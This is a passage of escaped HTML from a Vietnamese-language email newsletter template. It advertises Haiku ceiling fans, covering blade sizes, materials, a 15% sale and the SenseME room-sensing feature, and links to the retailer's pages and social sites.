<\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ecf0f1;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: #ecf0f1;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922756155-smart-fans-haiku.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div>\\r\\n    <div class=\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\">\\r\\n<h3><span style=\\\"font-size: 16px;\\\">K\\u00edch th\\u01b0\\u1edbc \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh qu\\u1ea1t Haiku<\\/span><\\/h3>\\r\\n<p>52 inch, 60 inch v\\u00e0 84 inch. N\\u1ebfu b\\u1ea1n c\\u1ea7n c\\u00e1nh l\\u1edbn h\\u01a1n? H\\u00e3y xem <strong><a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-lon\\\">Qu\\u1ea1t Tr\\u1ea7n C\\u00e1nh L\\u1edbn<\\/a>.<\\/strong><\\/p>\\r\\n  <img src=\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Fan-Haiku-Sizes.svg\\\" alt=\\\"Haiku Fans Size\\\"><\\/div><div class=\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\">\\r\\n<h2><span style=\\\"font-size: 16px;\\\">K\\u00edch th\\u01b0\\u1edbc c\\u00e1nh qu\\u1ea1t Haiku ph\\u00f9 h\\u1ee3p d\\u00e0nh cho Nh\\u00e0 \\u1ede, Bi\\u1ec7t Th\\u1ef1, Penthouse.<\\/span><\\/h2>\\r\\n<p>Thi\\u1ebft k\\u1ebf qu\\u1ea1t tr\\u1ea7n Haiku c\\u00f3 s\\u1ea3i c\\u00e1nh ph\\u1ed5 th\\u00f4ng 3 c\\u00e1nh ch\\u1ea5t li\\u1ec7u Bamboo\\/Aluminium\\/Composite<\\/p>\\r\\n<img src=\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Haiku-Dimensions.svg\\\" alt=\\\"Haiku Fans Size\\\"><\\/div>\\r\\n\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a47e6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\">\\\" \\u0110\\u1eb3ng c\\u1ea5p th\\u01b0\\u1ee3ng l\\u01b0u<\\/span><\\/strong><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\">Ti\\u1ec7n \\u00edch x\\u1ee9ng t\\u1ea7m \\\"<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #292828; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>CH\\u1ea4T LI\\u1ec6U CAO C\\u1ea4P<\\/strong><br \\/>Haiku\\u00ae \\u0111\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng v\\u1edbi<br \\/>v\\u1eadt li\\u1ec7u ch\\u1ea5t l\\u01b0\\u1ee3ng cao, nh\\u01b0 Moso Bamboo\\u00a0<br \\/>ho\\u1eb7c Alumium (aircraft-grade). Qu\\u1ea1t Haiku\\u00a0<br \\/>\\u0111\\u01b0\\u1ee3c c\\u00e2n b\\u1eb1ng tay trong quy tr\\u00ecnh 13 b\\u01b0\\u1edbc,\\u00a0<br \\/>\\u0111\\u1ea3m b\\u1ea3o s\\u1ebd kh\\u00f4ng c\\u00f3 qu\\u1ea1t n\\u00e0o rung l\\u1eafc.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:37px; v-text-anchor:middle; width:152px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677923146192-Brochure_Haiku_New.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a77d6d; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'Playfair Display\', serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>Sale Off 15%<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 20px; font-weight: 400; color: #34495e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 49px; font-size: 18px;\\\"><strong>GI\\u00c1M S\\u00c1T C\\u00d4NG NGH\\u1ec6 TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"48%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #34495e;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 gi\\u00e1m s\\u00e1t c\\u0103n ph\\u00f2ng \\u00a0\\u0111\\u1ea3m\\u00a0<br \\/>b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 \\u0111\\u1ed9 \\u1ea9m, t\\u1ef1 \\u0111\\u1ed9ng \\u0111i\\u1ec1u ch\\u1ec9nh \\u00a0t\\u1ed1c \\u0111\\u1ed9\\u00a0<br \\/>Haiku khi \\u0111i\\u1ec1u ki\\u1ec7n thay \\u0111\\u1ed5i. N\\u1ebfu th\\u1eddi ti\\u1ebft n\\u00f3ng l\\u00ean\\u00a0<br \\/>SenseME ph\\u00e1t hi\\u1ec7n v\\u00e0 t\\u0103ng t\\u1ed1c \\u0111\\u1ed9 Haiku. M\\u1edf c\\u1eeda\\u00a0<br \\/>s\\u1ed5 v\\u00e0o ban \\u0111\\u00eam v\\u00e0 SenseME s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng gi\\u1ea3m t\\u1ed1c\\u00a0<br \\/>\\u0111\\u1ed9 qu\\u1ea1t khi nhi\\u1ec7t \\u0111\\u1ed9 gi\\u1ea3m.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 40px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:37px; v-text-anchor:middle; width:152px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a5726e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"line-height: 19.6px; font-size: 14px;\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"28%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #ca979a;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:183px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"183\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:183px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" 